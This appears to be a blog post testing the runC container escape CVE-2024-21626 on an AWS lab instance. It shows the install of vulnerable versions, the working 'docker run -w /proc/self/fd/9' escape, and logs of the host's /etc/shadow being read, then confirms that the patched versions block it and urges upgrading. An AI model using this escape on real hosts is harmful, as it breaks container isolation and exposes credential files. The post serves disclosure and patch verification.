avatarBill WANG

Summary

The web content describes a detailed test and analysis of the container escape vulnerability CVE-2024-21626, affecting runC and other related container tools, and emphasizes the importance of upgrading to patched versions.

Abstract

The article "Illustrate runC Escape Vulnerability CVE-2024-21626 with my tests" provides an in-depth examination of the CVE-2024-21626 vulnerability, which allows attackers to escape from containers running on affected versions of runC (v1.0.0-rc93 to v1.1.11) and Docker (fixed in v25.0.2). The author conducts tests on an AWS EC2 instance using RHEL-8 AMI and demonstrates how the vulnerability can be exploited to access sensitive host files such as /etc/hostname and /etc/shadow without any host directories being mounted. The tests are initially conducted with older, vulnerable versions of Docker and containerd, and then repeated with the latest, patched versions to show that the issue has been resolved in the updated releases. The author concludes by urging readers to upgrade their systems promptly, noting that some operating systems may not yet have patches available, especially if they have reached End-of-Life (EOL). References to Docker's security advisory, Red Hat's CVE status, and other relevant resources are provided for further information.

Opinions

  • The author emphasizes the severity of CVE-2024-21626, as it not only allows container escape but also potentially gives full control over the host system.
  • The article suggests that the vulnerability is a significant concern for containerized environments and that immediate action is required to mitigate the risk.
  • The author points out that while patches are available, some systems may still be vulnerable due to lack of updates or because they are running EOL operating systems.
  • The inclusion of detailed commands and output logs indicates the author's technical proficiency and a didactic approach to sharing knowledge about the vulnerability and its resolution.
  • By providing a step-by-step account of the testing process, the author underscores the importance of thorough security testing and the value of up-to-date container runtime and orchestration tools.

Illustrate runC Escape Vulnerability CVE-2024–21626 with my tests

CVE-2024–21626

The vulnerability CVE-2024–21626 allows an attacker to escape containers

For runC, a container runtime component, published version 1.1.12 to fix CVE-2024-21626 at 31, Jan 2024, which leads to escaping from containers. The range of affected versions are >= v1.0.0-rc93, <=1.1.11.

For containerd, the fixed versions are 1.6.28 and 1.7.13, the range of affected versions are 1.4.7 to 1.6.27 and 1.7.0 to 1.7.12.

For Docker, the fixed version is 25.0.2.

Run the test in AWS EC2 instance, RHEL-8 AMI image from AWS marketplace

# Use Redhat 8 as sample
$ yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo

# to install the older versions,
# before docker service is installed, 
# you need install containerd service first
$ yum list containerd.io --showduplicates

# install docker engine, so containerd is not in the list, 
# because it has been installed (with old version)
# run the list command with "--showduplicates"
$ yum list docker-ce --showduplicates 
...

# if you want to know all dependencies for "docker-ce" you can run 
# yum install docker-ce, but don't confirm with "Y"
# So the final installation commands are
sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo

sudo yum install containerd.io-1.6.27-3.1.el8 \
  docker-buildx-plugin-0.10.5-1.el8 \
  docker-compose-plugin-2.20.2-1.el8 \
  docker-ce-cli-1:24.0.4-1.el8 \
  docker-ce-rootless-extras-24.0.4-1.el8 \
  docker-ce-3:24.0.4-1.el8

enable docker service

$ sudo systemctl start docker
$ sudo systemctl enable docker

# Post-installation steps for Linux.
# for example, set ssm-user with docker run permission
# if the group is exist, ignore the error
$ sudo groupadd docker
$ sudo usermod -aG docker ssm-user

Show the docker versions, they are all older versions, which can be used to duplicate the issue now

sh-4.4$ docker version
Client: Docker Engine - Community
 Version:           24.0.4
 API version:       1.43
 Go version:        go1.20.5
 Git commit:        3713ee1
 Built:             Fri Jul  7 14:52:00 2023
 OS/Arch:           linux/amd64
 Context:           default

Server: Docker Engine - Community
 Engine:
  Version:          24.0.4
  API version:      1.43 (minimum version 1.12)
  Go version:       go1.20.5
  Git commit:       4ffc614
  Built:            Fri Jul  7 14:51:01 2023
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          1.6.27
  GitCommit:        a1496014c916f9e62104b33d1bb5bd03b0858e59
 runc:
  Version:          1.1.11
  GitCommit:        v1.1.11-0-g4bccb38
 docker-init:
  Version:          0.19.0
  GitCommit:        de40ad0
sh-4.4$

Run the test

I tested several times,

  • /proc/self/fd/7
  • /proc/self/fd/8
  • /proc/self/fd/9

Finally successfully run the container with /proc/self/fd/9

docker run -w /proc/self/fd/9 --name cve-2024-21626 --rm -it debian:bookworm

So it can view the host’s /etc/hostname and /etc/shadow, from a container, without mount any folders from host at all.

  • ip-10–140–11–6.ap-southeast-2.compute.internal
  • ssm-user:!!:19760:7:365:7:30::

These are only exist in aws ec2 instance.

Run test with latest docker versions

remove old package and install latest dockers

# clean old version
$ sudo yum remove docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

# install latest version
$ sudo yum install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

# star docker service
$ sudo systemctl start docker

sh-4.4$ docker version
Client: Docker Engine - Community
 Version:           25.0.3
 API version:       1.44
 Go version:        go1.21.6
 Git commit:        4debf41
 Built:             Tue Feb  6 21:15:16 2024
 OS/Arch:           linux/amd64
 Context:           default

Server: Docker Engine - Community
 Engine:
  Version:          25.0.3
  API version:      1.44 (minimum version 1.24)
  Go version:       go1.21.6
  Git commit:       f417435
  Built:            Tue Feb  6 21:14:12 2024
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          1.6.28
  GitCommit:        ae07eda36dd25f8a1b98dfbf587313b99c0190bb
 runc:
  Version:          1.1.12
  GitCommit:        v1.1.12-0-g51d5e94
 docker-init:
  Version:          0.19.0
  GitCommit:        de40ad0

When run same command , I can’t run the container, then I just run a container without -w /proc/self/fd/8

$ docker run --name cve --rm -it debian:bookworm bash
root@5d48184c930d:/proc/self/fd# ls
0  1  2  255

# I can't view these files from host server now 

All logs for your reference

sh-4.4$ docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
Unable to find image 'debian:bookworm' locally
bookworm: Pulling from library/debian
6a299ae9cfd9: Pull complete
Digest: sha256:79becb70a6247d277b59c09ca340bbe0349af6aacb5afa90ec349528b53ce2c9
Status: Downloaded newer image for debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/8: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type.
sh-4.4$ docker run -w /proc/self/fd/7 --name cve-2024-21626 --rm -it debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: no such file or directory: unknown.
sh-4.4$ docker run -w /proc/self/fd/6 --name cve-2024-21626 --rm -it debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/6: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type.
sh-4.4$ docker run -w /proc/self/fd/9 --name cve-2024-21626 --rm -it debian:bookworm
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@a3238ac6f149:.# pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@a3238ac6f149:.# ls -F
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
blkio/  cpu@  cpu,cpuacct/  cpuacct@  cpuset/  devices/  freezer/  hugetlb/  memory/  net_cls@  net_cls,net_prio/  net_prio@  perf_event/  pids/  rdma/  systemd/
root@a3238ac6f149:.# ls ../../../../../
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
bin  boot  data  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@a3238ac6f149:.# ls ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
../../../../../etc/hostname
root@a3238ac6f149:.# ls ../../../../../etc/shadow
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
../../../../../etc/shadow
root@a3238ac6f149:.# cat ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
ip-10-140-11-6.ap-southeast-2.compute.internal
root@a3238ac6f149:.# cat ../../../../../etc/shadow
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root:*:19324:0:99999:7:::
bin:*:19324:0:99999:7:::
daemon:*:19324:0:99999:7:::
adm:*:19324:0:99999:7:::
lp:*:19324:0:99999:7:::
sync:*:19324:0:99999:7:::
shutdown:*:19324:0:99999:7:::
halt:*:19324:0:99999:7:::
mail:*:19324:0:99999:7:::
operator:*:19324:0:99999:7:::
games:*:19324:0:99999:7:::
ftp:*:19324:0:99999:7:::
nobody:*:19324:0:99999:7:::
dbus:!!:19725::::::
systemd-coredump:!!:19725::::::
systemd-resolve:!!:19725::::::
tss:!!:19725::::::
polkitd:!!:19725::::::
unbound:!!:19725::::::
sssd:!!:19725::::::
chrony:!!:19725::::::
sshd:!!:19725::::::
ec2-user:!!:19759:0:99999:7:::
cwagent:!!:19759::::::
rpc:!!:19759:7:365:7:30::
rpcuser:!!:19759::::::
splunk:!!:19759:7:365:7:30::
ssm-user:!!:19760:7:365:7:30::
root@a3238ac6f149:.# pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

Conculsion

The vulnerability CVE-2024–21626 not only enable malicious actors to escape containerized environments but also allow for full control over the underlying host system.

Please upgrade (yum or apt) your operation system as soon as possible. But it is too new currently, maybe the patch is not ready yet for some Operation Systems, and if your OS has been EOL, then no patch for this CVE any more.

Reference

Docker Security Advisory: Multiple Vulnerabilities in runc, BuildKit, and Moby — A patch (4.27.1) is now available for Docker Desktop.

Nitro’s Blog: Illustrate runC Escape Vulnerability CVE-2024–21626

Containers inherit breakout bugs in Linux tools

Redhat CVE Status — CVE-2024–21626

Ubuntu CVE status — CVE-2024–21626

AWS Linux (1/2/2023) Status

Debian Status

Learning is fun

# CVE-2024–21626 # Security # Docker # Kubernetes

Cve
Security
Docker
Kubernetes
DevOps
Recommended from ReadMedium